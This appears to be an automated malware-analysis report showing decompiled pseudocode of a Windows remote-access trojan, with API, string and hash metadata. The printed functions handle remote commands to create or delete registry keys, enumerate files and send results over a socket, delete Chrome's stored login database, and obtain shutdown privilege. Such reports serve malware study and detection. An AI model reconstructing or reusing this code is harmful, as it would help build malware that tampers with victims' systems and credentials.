				_push(_t332);
				_push( &_v52);
				E00401F0C( &_a8);
				_t355 = (_t352 & 0xfffffff8) - 0x44;
				E004020E6(_t203, _t355, __edx, _t383, 0x46103c);
				_t356 = _t355 - 0x18;
				E004020E6(_t203, _t356, __edx, _t383,  &_v68);
				E00411260( &_v108, __edx);
				_t357 = _t356 + 0x30;
				_t339 =  *_t77 - 0x35;
				if(_t339 == 0) {
					E00405BA4(_t203,  &_v76);
					__eflags = E00403255( &_v88) - 1;
					if(__eflags > 0) {
						E00409BB0(_t203,  &_v80, E00401F2E(E004031A1( &_v88, _t320, __eflags, 1)));
					}
					E004020E6(_t203, _t357 - 0x18, _t320, __eflags, E004031A1( &_v88, _t320, __eflags, 0));
					_t88 = L00404090( &_v84);
					_t321 = 1;
					_t217 = _t88;
					L37:
					E0040BE4D(_t217, _t321, _t390);
					L38:
					E004031D1();
					L39:
					E004031CC( &_v88);
					E00401F97();
					E00401F97();
					return 0;
				}
				_t341 = _t339 - 1;
				if(_t341 == 0) {
					_t99 = E00401F2E(E004031A1( &_v88, __edx, __eflags, 2));
					_t101 = E00401F2E(E004031A1( &_v92, __edx, __eflags, 1));
					_t334 = 0;
					_t102 = E004031A1( &_v96, __edx, __eflags, 0);
					_t360 = _t357 - 0x18;
					E004020E6(_t203, _t360, _t320, __eflags, _t102);
					_t104 = E0040BDBC(_t203, __eflags, _t99);
					_t322 = _t101;
					_t105 = E0040BB63(_t104, _t101);
					_t362 = _t360 + 0x18 - 0x18;
					_t233 = _t360 + 0x18 - 0x18;
					__eflags = _t105;
					if(__eflags == 0) {
						_push("2");
						L33:
						E0040207E(_t203, _t233);
						E00401790(_t203, 0x461378, _t322, __eflags);
						goto L39;
					}
					_push("1");
					L20:
					E0040207E(_t203, _t233);
					E00401790(_t203, 0x461378, _t322, __eflags);
					E004020E6(_t203, _t362 - 0x18, _t322, __eflags, E004031A1( &_v120, _t322, __eflags, _t334));
					E0040BE4D(E00401F2E(E004031A1( &_v128, _t322, __eflags, 1)), 0, __eflags);
					goto L39;
				}
				_t343 = _t341 - 1;
				if(_t343 == 0) {
					E004031DB(_t203,  &_v80, E00401F2E(E004031A1( &_v88, __edx, __eflags, 1)));
					 *0x460cd4 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
					_t120 = L00404090( &_v84);
					_t121 = E004031A1( &_v96, _t320, __eflags, 0);
					_t365 = _t357 - 0x18;
					E004020E6(_t203, _t365, _t320, __eflags, _t121);
					_t123 = E0040BDBC(_t203, __eflags, _t120);
					_t366 = _t365 + 0x18;
					__eflags =  *0x460cd4(_t123);
					if(__eflags != 0) {
						_t247 = _t366 - 0x18;
						_push("9");
						L12:
						E0040207E(_t203, _t247);
						E00401790(_t203, 0x461378, _t320, __eflags);
						goto L38;
					}
					_t127 = E00401F26();
					_t344 = 2;
					_t203 = E0040C653( &_v84, "\\", _t127 - _t344);
					__eflags = _t203 - 0xffffffff;
					if(__eflags != 0) {
						_t50 = _t203 + 1; // 0x1
						_push( ~(__eflags > 0) | _t50 * _t344);
						_t132 = E00428C9A( ~(__eflags > 0) | _t50 * _t344, _t50 * _t344 >> 0x20, _t344, __eflags);
						_pop(_t255);
						_v100 = _t132;
						_t135 = L00404090(E00405378( &_v84,  &_v36, _t255, _t203));
						_t203 = _v112;
						_t326 = _v112 - _t135;
						__eflags = _t326;
						do {
							_t258 =  *_t135 & 0x0000ffff;
							 *(_t326 + _t135) = _t258;
							_t135 = _t135 + _t344;
							__eflags = _t258;
						} while (__eflags != 0);
						E004031D1();
						_t137 = E004031A1( &_v96, _t326, __eflags, 0);
						_t368 = _t366 - 0x18;
						E004020E6(_t203, _t368, _t326, __eflags, _t137);
						_t320 = 0;
						__eflags = 0;
						E0040BE4D(_t203, 0, 0);
						L00428C95(_t203);
						_t369 = _t368 + 0x1c;
						L28:
						_t247 = _t369 - 0x18;
						_push("8");
						goto L12;
					}
					_t141 = E004031A1( &_v96, _t320, __eflags, 0);
					_t371 = _t366 - 0x18;
					E004020E6(_t203, _t371, _t320, __eflags, _t141);
					_t320 = 0;
					E0040BE4D(0, 0, __eflags);
					_t369 = _t371 + 0x18;
					goto L28;
				}
				_t345 = _t343 - 1;
				if(_t345 == 0) {
					_t146 = E00432099(_t144, E00401F2E(E004031A1( &_v88, __edx, __eflags, 3)));
					__eflags = _t146 - _t332;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(E00401F2E(E004031A1( &_v92, __edx, __eflags, _t332)))));
						_t150 = E00401F2E(E004031A1( &_v92, __edx, __eflags, 2));
						_t152 = E00401F2E(E004031A1( &_v96, _t320, __eflags, 1));
						_t334 = 0;
						__eflags = 0;
						_t153 = E004031A1( &_v100, _t320, 0, 0);
						_t372 = _t357 - 0x18;
						E004020E6(_t203, _t372, _t320, __eflags, _t153);
						_t155 = E0040BDBC(_t203, __eflags, _t150);
						_t373 = _t372 + 0x18;
						_t322 = _t152;
						_t156 = E0040BA77(_t155, _t152);
					} else {
						__eflags = _t146 - 0xb;
						if(__eflags == 0) {
							_t158 = E00401F2E(E004031A1( &_v92, __edx, __eflags, _t332));
							_t160 = E00401F2E(E004031A1( &_v92, __edx, __eflags, 2));
							_t162 = E00401F2E(E004031A1( &_v96, _t320, __eflags, 1));
							_t334 = 0;
							_t163 = E004031A1( &_v100, _t320, __eflags, 0);
							_t374 = _t357 - 0x18;
							E004020E6(_t203, _t374, _t320, __eflags, _t163);
							_t165 = E0040BDBC(_t203, __eflags, _t160);
							_t322 = _t162;
							_t156 = E0040BABB(_t165, _t162,  *_t158,  *((intOrPtr*)(_t158 + 4)));
							_t373 = _t374 + 0x24;
						} else {
							_push(_t146);
							E004031A1( &_v92, __edx, __eflags, _t332);
							_push(E00401F26());
							_push(E00401F2E(E004031A1( &_v92, __edx, __eflags, _t332)));
							_t171 = E00401F2E(E004031A1( &_v96, _t320, __eflags, 2));
							_t173 = E00401F2E(E004031A1( &_v100, _t320, __eflags, 1));
							_t334 = 0;
							_t174 = E004031A1( &_v104, _t320, __eflags, 0);
							_t376 = _t357 - 0x18;
							E004020E6(_t203, _t376, _t320, __eflags, _t174);
							_t176 = E0040BDBC(_t203, __eflags, _t171);
							_t322 = _t173;
							_t156 = E0040B978(_t176, _t173);
							_t373 = _t376 + 0x28;
						}
					}
					_t362 = _t373 - 0x18;
					_t233 = _t373 - 0x18;
					__eflags = _t156;
					if(__eflags == 0) {
						_push("5");
						goto L33;
					} else {
						_push("4");
						goto L20;
					}
				}
				_t388 = _t345 != 1;
				if(_t345 != 1) {
					goto L39;
				}
				E004031DB(_t203,  &_v80, E00401F2E(E004031A1( &_v88, __edx, _t388, 1)));
				_t181 = L00404090( &_v84);
				_t182 = E004031A1( &_v96, __edx, _t388, 0);
				_t378 = _t357 - 0x18;
				E004020E6(_t203, _t378, __edx, _t388, _t182);
				_t185 = RegCreateKeyExW(E0040BDBC(_t203, _t388, _t181), 0, 0, 0, 0x20006, 0,  &_v104, 0, ??);
				RegCloseKey(_v112);
				_t380 = _t378 + 0x18 - 0x18;
				_t247 = _t378 + 0x18 - 0x18;
				_t389 = _t185;
				if(_t185 != 0) {
					_push("7");
					goto L12;
				}
				E0040207E(_t203, _t247, "6");
				_push(0x72);
				E00401790(_t203, 0x461378, _t320, _t389);
				_t205 = E00405390( &_v108, 0x461378, 0x461378);
				_t390 = _t205 - 0xffffffff;
				if(_t205 != 0xffffffff) {
					_t14 = _t205 + 1; // 0x1
					_t351 = 2;
					_push( ~(__eflags > 0) | _t14 * _t351);
					_t192 = E00428C9A( ~(__eflags > 0) | _t14 * _t351, _t14 * _t351 >> 0x20, _t351, __eflags);
					_pop(_t310);
					_v112 = _t192;
					_t195 = L00404090(E00405378( &_v96,  &_v48, _t310, _t205));
					_t206 = _v124;
					_t329 = _v124 - _t195;
					__eflags = _t329;
					do {
						_t313 =  *_t195 & 0x0000ffff;
						 *(_t329 + _t195) = _t313;
						_t195 = _t195 + _t351;
						__eflags = _t313;
					} while (__eflags != 0);
					E004031D1();
					E004020E6(_t206, _t380 - 0x18, _t329, __eflags, E004031A1( &_v108, _t329, __eflags, 0));
					E0040BE4D(_t206, 0, __eflags);
					L00428C95(_t206);
					goto L38;
				}
				E004020E6(_t205, _t380 - 0x18, _t320, _t390, E004031A1( &_v108, _t320, _t390, 0));
				_t321 = 0;
				_t217 = 0;
				goto L37;
			}





























































































                                            0x0040c00c
                                            0x0040c00c
                                            0x0040c018
                                            0x0040c01b
                                            0x0040c020
                                            0x0040c024
                                            0x0040c02a
                                            0x0040c02f
                                            0x0040c030
                                            0x0040c035
                                            0x0040c03f
                                            0x0040c044
                                            0x0040c04e
                                            0x0040c057
                                            0x0040c05c
                                            0x0040c05f
                                            0x0040c062
                                            0x0040c572
                                            0x0040c580
                                            0x0040c583
                                            0x0040c59c
                                            0x0040c59c
                                            0x0040c5b2
                                            0x0040c5bb
                                            0x0040c5c0
                                            0x0040c5c2
                                            0x0040c5c4
                                            0x0040c5c4
                                            0x0040c5cc
                                            0x0040c5d0
                                            0x0040c5d5
                                            0x0040c5d9
                                            0x0040c5e2
                                            0x0040c5ea
                                            0x0040c5f7
                                            0x0040c5f7
                                            0x0040c068
                                            0x0040c06b
                                            0x0040c500
                                            0x0040c513
                                            0x0040c518
                                            0x0040c521
                                            0x0040c526
                                            0x0040c52c
                                            0x0040c531
                                            0x0040c539
                                            0x0040c53d
                                            0x0040c543
                                            0x0040c546
                                            0x0040c548
                                            0x0040c54a
                                            0x0040c556
                                            0x0040c55b
                                            0x0040c55b
                                            0x0040c567
                                            0x00000000
                                            0x0040c567
                                            0x0040c54c
                                            0x0040c355
                                            0x0040c355
                                            0x0040c361
                                            0x0040c376
                                            0x0040c391
                                            0x00000000
                                            0x0040c396
                                            0x0040c071
                                            0x0040c074
                                            0x0040c3bf
                                            0x0040c3df
                                            0x0040c3e4
                                            0x0040c3f1
                                            0x0040c3f6
                                            0x0040c3fc
                                            0x0040c401
                                            0x0040c406
                                            0x0040c410
                                            0x0040c412
                                            0x0040c4e7
                                            0x0040c4e9
                                            0x0040c1c9
                                            0x0040c1c9
                                            0x0040c1d5
                                            0x00000000
                                            0x0040c1d5
                                            0x0040c41c
                                            0x0040c423
                                            0x0040c435
                                            0x0040c437
                                            0x0040c43a
                                            0x0040c461
                                            0x0040c46d
                                            0x0040c46e
                                            0x0040c473
                                            0x0040c475
                                            0x0040c48a
                                            0x0040c48f
                                            0x0040c495
                                            0x0040c495
                                            0x0040c497
                                            0x0040c497
                                            0x0040c49a
                                            0x0040c49e
                                            0x0040c4a0
                                            0x0040c4a0
                                            0x0040c4a9
                                            0x0040c4b3
                                            0x0040c4b8
                                            0x0040c4be
                                            0x0040c4c3
                                            0x0040c4c3
                                            0x0040c4c7
                                            0x0040c4cd
                                            0x0040c4d2
                                            0x0040c4d5
                                            0x0040c4d8
                                            0x0040c4da
                                            0x00000000
                                            0x0040c4da
                                            0x0040c441
                                            0x0040c446
                                            0x0040c44c
                                            0x0040c451
                                            0x0040c455
                                            0x0040c45a
                                            0x00000000
                                            0x0040c45a
                                            0x0040c07a
                                            0x0040c07d
                                            0x0040c1f2
                                            0x0040c1fc
                                            0x0040c1fe
                                            0x0040c2f8
                                            0x0040c303
                                            0x0040c316
                                            0x0040c31b
                                            0x0040c31b
                                            0x0040c324
                                            0x0040c329
                                            0x0040c32f
                                            0x0040c334
                                            0x0040c339
                                            0x0040c33c
                                            0x0040c340
                                            0x0040c204
                                            0x0040c204
                                            0x0040c207
                                            0x0040c289
                                            0x0040c2a0
                                            0x0040c2b3
                                            0x0040c2b8
                                            0x0040c2c1
                                            0x0040c2c6
                                            0x0040c2cc
                                            0x0040c2d1
                                            0x0040c2d9
                                            0x0040c2dd
                                            0x0040c2e2
                                            0x0040c209
                                            0x0040c209
                                            0x0040c20b
                                            0x0040c217
                                            0x0040c229
                                            0x0040c237
                                            0x0040c24a
                                            0x0040c24f
                                            0x0040c258
                                            0x0040c25d
                                            0x0040c263
                                            0x0040c268
                                            0x0040c270
                                            0x0040c274
                                            0x0040c279
                                            0x0040c279
                                            0x0040c207
                                            0x0040c347
                                            0x0040c34a
                                            0x0040c34c
                                            0x0040c34e
                                            0x0040c39e
                                            0x00000000
                                            0x0040c350
                                            0x0040c350
                                            0x00000000
                                            0x0040c350
                                            0x0040c34e
                                            0x0040c083
                                            0x0040c086
                                            0x00000000
                                            0x00000000
                                            0x0040c0a3
                                            0x0040c0bd
                                            0x0040c0c8
                                            0x0040c0cd
                                            0x0040c0d3
                                            0x0040c0e1
                                            0x0040c0ed
                                            0x0040c0f3
                                            0x0040c0f6
                                            0x0040c0f8
                                            0x0040c0fa
                                            0x0040c1c4
                                            0x00000000
                                            0x0040c1c4
                                            0x0040c105
                                            0x0040c10a
                                            0x0040c111
                                            0x0040c121
                                            0x0040c123
                                            0x0040c126
                                            0x0040c148
                                            0x0040c14d
                                            0x0040c157
                                            0x0040c158
                                            0x0040c15d
                                            0x0040c15f
                                            0x0040c174
                                            0x0040c179
                                            0x0040c17f
                                            0x0040c17f
                                            0x0040c181
                                            0x0040c181
                                            0x0040c184
                                            0x0040c188
                                            0x0040c18a
                                            0x0040c18a
                                            0x0040c193
                                            0x0040c1a8
                                            0x0040c1b1
                                            0x0040c1b7
                                            0x00000000
                                            0x0040c1bc
                                            0x0040c138
                                            0x0040c13d
                                            0x0040c13f
                                            0x00000000

                                            APIs
                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040C0E1
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040C0ED
                                              • Part of subcall function 00401790: send.WS2_32(?,00000000,00000000,00000000), ref: 00401804
                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0040C3CE
                                            • GetProcAddress.KERNEL32(00000000), ref: 0040C3D5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                            • API String ID: 2127411465-314212984
                                            • Opcode ID: 1f3d45b8c100e62d8d8558ca105ad342608a44de2a15d879aae6557b3197e1b6
                                            • Instruction ID: 760d6a34e7a8a201d400cbf76665bf3eda7483d085d822d21d9cb3a95690b848
                                            • Opcode Fuzzy Hash: 1f3d45b8c100e62d8d8558ca105ad342608a44de2a15d879aae6557b3197e1b6
                                            • Instruction Fuzzy Hash: C0E1D771B0430066CA04BB76CD5797E76A99F95309F40063FF942BB1D3EE7D9A08C29A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406776, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 245fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 90%
                                            			E00406776(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __esi;
				intOrPtr* _t81;
				intOrPtr* _t83;
				signed int _t93;
				signed int _t98;
				intOrPtr* _t102;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				void* _t146;
				signed int _t147;
				intOrPtr _t150;
				char* _t171;
				char* _t172;
				char* _t211;
				void* _t215;
				void* _t219;
				void* _t221;
				intOrPtr _t222;
				void* _t223;
				void* _t225;
				void* _t226;

				_t226 = __eflags;
				_t150 = __ecx;
				E00447508(E00448A6E, _t219);
				_t222 = _t221 - 0x308;
				_push(_t146);
				 *((intOrPtr*)(_t219 - 0x10)) = _t222;
				 *((intOrPtr*)(_t219 - 0x18)) = _t150;
				E004020CF(_t146, _t219 - 0x5c);
				_t81 = E00405635(_t219 + 0x20, _t219 - 0x1c);
				_t83 = E004055F8(_t219 + 0x20, _t219 - 0x20);
				E00406D35(_t219 - 0x28,  *((intOrPtr*)(E00405635(_t219 + 0x20, _t219 - 0x24))),  *_t83,  *_t81);
				_t223 = _t222 + 0xc;
				_t204 = _t219 + 8;
				_t215 = FindFirstFileW(L00404090(E0040590A(_t219 - 0xbc, _t219 + 8, _t226, "*")), _t219 - 0x30c);
				 *(_t219 - 0x1c) = _t215;
				E004031D1();
				if(_t215 != 0xffffffff) {
					_t147 = 0;
					__eflags = 0;
					while(1) {
						_t93 = FindNextFileW(_t215, _t219 - 0x30c);
						__eflags = _t93;
						if(_t93 == 0) {
							break;
						}
						_t211 =  *((intOrPtr*)(_t219 - 0x18));
						__eflags =  *_t211;
						if( *_t211 == 0) {
							__eflags =  *(_t219 - 0x30c) & 0x00000010;
							if(( *(_t219 - 0x30c) & 0x00000010) == 0) {
								L25:
								E004031DB(_t147, _t219 - 0x40, _t219 - 0x2e0);
								_t102 = E00405635(_t219 - 0x40, _t219 - 0x28);
								_t217 = E004055F8(_t219 - 0x40, _t219 - 0x24);
								E00406D35(_t219 - 0x44,  *((intOrPtr*)(E00405635(_t219 - 0x40, _t219 - 0x20))),  *_t104,  *_t102);
								_t223 = _t223 + 8;
								__eflags = E00406BB7(_t219 - 0x40, _t219 + 0x20) - 0xffffffff;
								if(__eflags == 0) {
									L29:
									E004031D1();
									_t215 =  *(_t219 - 0x1c);
									continue;
								}
								E00401FA1(_t219 - 0x5c, _t204, _t217, E004020A5(_t147, _t219 - 0x74, _t204, __eflags, _t219 - 0x30c, 0x250));
								E00401F97();
								 *(_t219 - 4) = _t147;
								_t223 = _t223 - 0x18;
								_t204 = E00404095(_t147, _t219 - 0x74, E004111F2(_t147, _t219 - 0x8c, _t219 + 8), __eflags, 0x46103c);
								E00404095(_t147, _t223, _t117, __eflags, _t219 - 0x5c);
								_push(0x66);
								__eflags = E00401790(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) - 0xffffffff;
								E00401F97();
								E00401F97();
								if((_t147 & 0xffffff00 | E00401790(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) == 0xffffffff) == 0) {
									 *(_t219 - 4) =  *(_t219 - 4) | 0xffffffff;
									_t147 = 0;
									__eflags = 0;
									goto L29;
								}
								E004031D1();
								E00401F97();
								E004031D1();
								E004031D1();
								_t98 = 0;
								L31:
								 *[fs:0x0] =  *((intOrPtr*)(_t219 - 0xc));
								return _t98;
							}
							_t171 = ".";
							_t126 = _t219 - 0x2e0;
							while(1) {
								_t204 =  *_t126;
								__eflags = _t204 -  *_t171;
								if(_t204 !=  *_t171) {
									break;
								}
								__eflags = _t204;
								if(_t204 == 0) {
									L13:
									_t127 = _t147;
									L15:
									__eflags = _t127;
									if(_t127 == 0) {
										goto L25;
									}
									_t172 = L"..";
									_t128 = _t219 - 0x2e0;
									while(1) {
										_t204 =  *_t128;
										__eflags = _t204 -  *_t172;
										if(_t204 !=  *_t172) {
											break;
										}
										__eflags = _t204;
										if(_t204 == 0) {
											L21:
											_t129 = _t147;
											L23:
											__eflags = _t129;
											if(__eflags != 0) {
												_push(_t172);
												_t204 = E00406D83(_t147, _t219 - 0x8c, _t219 + 8, __eflags, E004031DB(_t147, _t219 - 0x74, _t219 - 0x2e0));
												E00406DA7(_t147, _t219 - 0xa4, _t132, __eflags);
												E004031D1();
												E004031D1();
												_t225 = _t223 - 0x18;
												E00405481(_t147, _t225, _t132, __eflags, _t219 + 0x20);
												_t223 = _t225 - 0x18;
												E00405481(_t147, _t223, _t204, __eflags, _t219 - 0xa4);
												E00406776(_t211, _t204, __eflags);
												E004031D1();
											}
											goto L25;
										}
										_t204 =  *((intOrPtr*)(_t128 + 2));
										_t29 =  &(_t172[2]); // 0x2e
										__eflags = _t204 -  *_t29;
										if(_t204 !=  *_t29) {
											break;
										}
										_t128 = _t128 + 4;
										_t172 =  &(_t172[4]);
										__eflags = _t204;
										if(_t204 != 0) {
											continue;
										}
										goto L21;
									}
									asm("sbb eax, eax");
									_t129 = _t128 | 0x00000001;
									__eflags = _t129;
									goto L23;
								}
								_t204 =  *((intOrPtr*)(_t126 + 2));
								_t26 =  &(_t171[2]); // 0x2e0000
								__eflags = _t204 -  *_t26;
								if(_t204 !=  *_t26) {
									break;
								}
								_t126 = _t126 + 4;
								_t171 =  &(_t171[4]);
								__eflags = _t204;
								if(_t204 != 0) {
									continue;
								}
								goto L13;
							}
							asm("sbb eax, eax");
							_t127 = _t126 | 0x00000001;
							__eflags = _t127;
							goto L15;
						}
						FindClose(_t215);
						L6:
						E00401F97();
						E004031D1();
						E004031D1();
						_t98 = _t147;
						goto L31;
					}
					FindClose(_t215);
					E00401F97();
					E004031D1();
					E004031D1();
					_t98 = 1;
					goto L31;
				}
				_t147 = 1;
				goto L6;
			}



























                                            0x00406776
                                            0x00406776
                                            0x0040677b
                                            0x00406780
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x00406792
                                            0x0040679e
                                            0x004067ac
                                            0x004067c8
                                            0x004067cd
                                            0x004067dc
                                            0x004067f9
                                            0x004067fb
                                            0x00406804
                                            0x0040680c
                                            0x00406812
                                            0x00406812
                                            0x00406814
                                            0x0040681c
                                            0x00406822
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x0040682a
                                            0x0040682d
                                            0x00406830
                                            0x00406858
                                            0x0040685f
                                            0x0040694f
                                            0x00406959
                                            0x00406965
                                            0x00406978
                                            0x0040698f
                                            0x00406994
                                            0x004069a3
                                            0x004069a6
                                            0x00406a5f
                                            0x00406a62
                                            0x00406a67
                                            0x00000000
                                            0x00406a67
                                            0x004069c4
                                            0x004069cc
                                            0x004069d1
                                            0x004069d4
                                            0x004069fb
                                            0x004069ff
                                            0x00406a05
                                            0x00406a12
                                            0x00406a1b
                                            0x00406a26
                                            0x00406a2d
                                            0x00406a59
                                            0x00406a5d
                                            0x00406a5d
                                            0x00000000
                                            0x00406a5d
                                            0x00406a32
                                            0x00406a3a
                                            0x00406a42
                                            0x00406a4a
                                            0x00406a4f
                                            0x00406a90
                                            0x00406a93
                                            0x00406aa0
                                            0x00406aa0
                                            0x00406865
                                            0x0040686a
                                            0x00406870
                                            0x00406870
                                            0x00406873
                                            0x00406876
                                            0x00000000
                                            0x00000000
                                            0x00406878
                                            0x0040687b
                                            0x00406892
                                            0x00406892
                                            0x0040689b
                                            0x0040689b
                                            0x0040689d
                                            0x00000000
                                            0x00000000
                                            0x004068a3
                                            0x004068a8
                                            0x004068ae
                                            0x004068ae
                                            0x004068b1
                                            0x004068b4
                                            0x00000000
                                            0x00000000
                                            0x004068b6
                                            0x004068b9
                                            0x004068d0
                                            0x004068d0
                                            0x004068d9
                                            0x004068d9
                                            0x004068db
                                            0x004068dd
                                            0x004068fd
                                            0x00406905
                                            0x00406911
                                            0x00406919
                                            0x0040691e
                                            0x00406927
                                            0x0040692c
                                            0x00406938
                                            0x0040693f
                                            0x0040694a
                                            0x0040694a
                                            0x00000000
                                            0x004068db
                                            0x004068bb
                                            0x004068bf
                                            0x004068bf
                                            0x004068c3
                                            0x00000000
                                            0x00000000
                                            0x004068c5
                                            0x004068c8
                                            0x004068cb
                                            0x004068ce
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004068ce
                                            0x004068d4
                                            0x004068d6
                                            0x004068d6
                                            0x00000000
                                            0x004068d6
                                            0x0040687d
                                            0x00406881
                                            0x00406881
                                            0x00406885
                                            0x00000000
                                            0x00000000
                                            0x00406887
                                            0x0040688a
                                            0x0040688d
                                            0x00406890
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406890
                                            0x00406896
                                            0x00406898
                                            0x00406898
                                            0x00000000
                                            0x00406898
                                            0x00406833
                                            0x00406839
                                            0x0040683c
                                            0x00406844
                                            0x0040684c
                                            0x00406851
                                            0x00000000
                                            0x00406851
                                            0x00406a70
                                            0x00406a79
                                            0x00406a81
                                            0x00406a89
                                            0x00406a8e
                                            0x00000000
                                            0x00406a8e
                                            0x0040680e
                                            0x00000000

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0040677B
                                              • Part of subcall function 0040590A: char_traits.LIBCPMT ref: 00405925
                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004067F3
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0040681C
                                            • FindClose.KERNEL32(000000FF), ref: 00406833
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstH_prologNextchar_traits
                                            • String ID: lVE
                                            • API String ID: 3260228402-1423680667
                                            • Opcode ID: e7e8fc27e41a74603c97019b5bb629f4a914ba0e940bfb6fc741dbfcd73cffaa
                                            • Instruction ID: 1fd7987bad3a34957e33ed6317166623b45ccb0ce58e7519b4813d1708515bab
                                            • Opcode Fuzzy Hash: e7e8fc27e41a74603c97019b5bb629f4a914ba0e940bfb6fc741dbfcd73cffaa
                                            • Instruction Fuzzy Hash: 3A917C32A001199ACB15FFA1CC519EE7779AF25308F51417FE806B71E1EB386B49CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004073AB, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 71%
                                            			E004073AB(void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;

				_t34 = __eflags;
				E00402973(_t20,  &_v28, E0040207E(_t20,  &_v52, E00430F6D(_t20, __eflags, "UserProfile")), _t34, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				E00401F97();
				if(DeleteFileA(E00401F2E( &_v28)) != 0) {
					_t28 = _t31 - 0x18;
					_push("\n[Chrome StoredLogins found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t31 - 0x18;
						_push("\n[Chrome StoredLogins not found]");
						L6:
						E0040207E(_t20, _t28);
						E00407B4A();
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401F97();
				return _t21;
			}












                                            0x004073ab
                                            0x004073d0
                                            0x004073d9
                                            0x004073ef
                                            0x00407415
                                            0x00407417
                                            0x00000000
                                            0x004073f1
                                            0x004073f8
                                            0x004073fb
                                            0x00407409
                                            0x0040740b
                                            0x0040741c
                                            0x0040741c
                                            0x00407421
                                            0x00407426
                                            0x00407402
                                            0x00407402
                                            0x00407402
                                            0x004073fb
                                            0x0040742e
                                            0x00407439

                                            APIs
                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 004073E7
                                            • GetLastError.KERNEL32 ref: 004073F1
                                            Strings
                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 004073B2
                                            • UserProfile, xrefs: 004073B7
                                            • [Chrome StoredLogins found, cleared!], xrefs: 00407417
                                            • [Chrome StoredLogins not found], xrefs: 0040740B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteErrorFileLast
                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                            • API String ID: 2018770650-1062637481
                                            • Opcode ID: 279c9f7ddc331b62e93a76e5967c298d130e73fb6625343b3cd5eda8b1e7930d
                                            • Instruction ID: 05395c17ede11ba1716241f9dffb6e55923a6a75f41cf8cf127dc7957f57bf35
                                            • Opcode Fuzzy Hash: 279c9f7ddc331b62e93a76e5967c298d130e73fb6625343b3cd5eda8b1e7930d
                                            • Instruction Fuzzy Hash: B0012B31E8510556CA047775CD2BCBF3B249A11308B50013FF402721E3ED795905C5CF
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040E39F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040E39F() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}






                                            0x0040e3b3
                                            0x0040e3c5
                                            0x0040e3d1
                                            0x0040e3dd
                                            0x0040e3e4
